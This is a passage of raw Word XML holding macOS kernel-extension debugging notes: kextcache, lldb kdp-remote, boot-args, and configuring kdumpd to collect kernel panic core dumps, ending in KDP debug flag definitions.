    <w:p w:rsidR="006956E7" w:rsidRPr="006956E7" w:rsidRDefault="006956E7" w:rsidP="006956E7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sh-3.2# kextcache -invalidate /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRPr="006956E7" w:rsidRDefault="006956E7" w:rsidP="006956E7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kextcache -invalidate /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRDefault="006956E7" w:rsidP="006956E7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRPr="006956E7" w:rsidRDefault="006956E7" w:rsidP="006956E7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kextcache -arch x86_64 -local-root -all-loaded -kernel /System/Library/Kernels/kernel -prelinked-kernel /System/Library/Caches/com.apple.kext.caches/Startup/kernelcache -volume-root / /System/Library/Extensions /Library/Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRDefault="006956E7" w:rsidP="006956E7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>kextcache -arch x86_64 -local-root -all-loaded -kernel /System/Library/Kernels/kernel.development -prelinked-kernel /System/Library/Caches/com.apple.kext.caches/Startup/kernelcache.development -volume-root / /System/Library/Extensions /Library/Extensions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRDefault="006956E7" w:rsidP="006956E7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444C32" w:rsidRDefault="00444C32" w:rsidP="0014464C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo reboot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B80" w:rsidRPr="00850B80" w:rsidRDefault="00850B80" w:rsidP="00850B80">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg 2" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg 2" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850B80">
        <w:rPr>
          <w:rFonts w:ascii="MS Shell Dlg 2" w:eastAsia="宋体" w:hAnsi="MS Shell Dlg 2" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo chown -R root:wheel HelloWorld.kext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850B80" w:rsidRPr="00850B80" w:rsidRDefault="00850B80" w:rsidP="0014464C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc445313314"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Controller Mac VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="0004552E" w:rsidRPr="0004552E" w:rsidRDefault="0004552E" w:rsidP="0004552E">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">arp </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TARGET_BOX_IP_ADDR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TARGET_BOX_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>_ADDR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRDefault="00A02543" w:rsidP="0014464C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lldb /Library/Developer/KDKs/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/System/Library/Kernels/kernel.development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;= 10.9 TARGET: use release kernel, DEBUG might be too slow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># lldb /Library/Developer/KDKs/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/mach_kernel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(lldb)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>settings set target.load-script-from-symbol-file true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004552E" w:rsidRDefault="0004552E" w:rsidP="00A02543">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(lldb) kdp-remote TARGET_BOX_IP_ADDR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004552E" w:rsidRPr="0004552E" w:rsidRDefault="0004552E" w:rsidP="0004552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40"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004552E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(lldb) continue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004552E" w:rsidRPr="00A02543" w:rsidRDefault="003435D8" w:rsidP="00A02543">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(lldb)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> br set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>n kext_alloc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014464C" w:rsidRPr="006B4005" w:rsidRDefault="0014464C" w:rsidP="0014464C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc445313315"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bootcaches.plist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="00CE22CB" w:rsidRDefault="00CE22CB" w:rsidP="00CE22CB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc445313316"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CoreDump</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w:rsidR="00CE22CB" w:rsidRDefault="004106D2" w:rsidP="00CE22CB">
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidR="00CE22CB" w:rsidRPr="00F362DE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/technotes/tn2004/tn2118.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CE22CB" w:rsidRPr="00CE22CB" w:rsidRDefault="00CE22CB" w:rsidP="00CE22CB"/>
    <w:p w:rsidR="00F0592A" w:rsidRDefault="00F0592A" w:rsidP="00CE22CB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5065" w:rsidRDefault="003817CE" w:rsidP="002D5065">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/System/Library/LaunchDaemons/com.apple.kdumpd.plist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D5065" w:rsidRPr="002D5065" w:rsidRDefault="002D5065" w:rsidP="002D5065"/>
    <w:p w:rsidR="00F0592A" w:rsidRDefault="00F0592A" w:rsidP="00F0592A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh-3.2# nvram boot-args=</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">pmuflags=1 debug=0xd44 kext-dev-mode=1 kcsuffix=development </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v _panicd_ip=10.64.80.106</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0592A" w:rsidRPr="00F0592A" w:rsidRDefault="00F0592A" w:rsidP="00F0592A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">sh-3.2#  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F0592A">
        <w:t>dtrace -w -n "BEGIN{ panic();}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE22CB" w:rsidRDefault="00F0592A" w:rsidP="00CE22CB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00CE22CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4569" w:rsidRDefault="00EC4569" w:rsidP="00EC4569">
      <w:r>
        <w:t xml:space="preserve">sh-3.2# chown root:wheel </w:t>
      </w:r>
      <w:r w:rsidRPr="00C24725">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/PanicDumps/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4569" w:rsidRDefault="00EC4569" w:rsidP="00EC4569">
      <w:r>
        <w:t>sh-3.2# chmod 1777 /PanicDumps/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4569" w:rsidRDefault="00EC4569" w:rsidP="00EC4569">
      <w:r>
        <w:t>sh-3.2# su user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4569" w:rsidRDefault="00EC4569" w:rsidP="00EC4569">
      <w:r>
        <w:t xml:space="preserve">bash-3.2$ sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.kdumpd.plist </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4569" w:rsidRDefault="00EC4569" w:rsidP="00EC4569">
      <w:r>
        <w:t>Password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC4569" w:rsidRDefault="00EC4569" w:rsidP="00EC4569">
      <w:r>
        <w:t>bash-3.2$ sudo launchctl list | grep kdump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27E5A" w:rsidRDefault="00EC4569" w:rsidP="00EC4569">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>com.apple.kdumpd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00402A99" w:rsidRDefault="00402A99" w:rsidP="00EC4569"/>
    <w:p w:rsidR="00402A99" w:rsidRDefault="00402A99" w:rsidP="00402A99">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-send core dump </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00402A99" w:rsidRDefault="00402A99" w:rsidP="00EC4569"/>
    <w:p w:rsidR="00402A99" w:rsidRDefault="00402A99" w:rsidP="00EC4569">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(lldb) sendcore 10.64.80.251 nvDeviceTesla-GetTextureData-2.dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00402A99" w:rsidRDefault="00402A99" w:rsidP="00402A99">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(lldb) c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00402A99" w:rsidRDefault="00402A99" w:rsidP="00EC4569"/>
    <w:p w:rsidR="00C24725" w:rsidRDefault="00C24725" w:rsidP="00C24725">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lldb debug </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC2303" w:rsidRDefault="00AC2303" w:rsidP="00AC2303">
      <w:pPr>
        <w:ind w:leftChars="50" w:left="220" w:hangingChars="50" w:hanging="110"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">lldb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c /PanicDumps/xxxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> /Library/Developer/KDKs/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/System/Library/Kernels/kernel.development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C51F7" w:rsidRDefault="003C51F7" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc445313317"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kernel panic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w:rsidR="00743BEE" w:rsidRDefault="00743BEE" w:rsidP="00743BEE"/>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KDP_READY       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x1</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KDP_ARP         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x2</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KDP_BP_DIS      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x4</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KDP_GETC_ENA    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x8</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lastRenderedPageBreak/>
        <w:t>#define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> KDP_PANIC_DUMP_ENABLED </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x10</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PANIC_CORE_ON_NMI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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DBG_POST_CORE     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
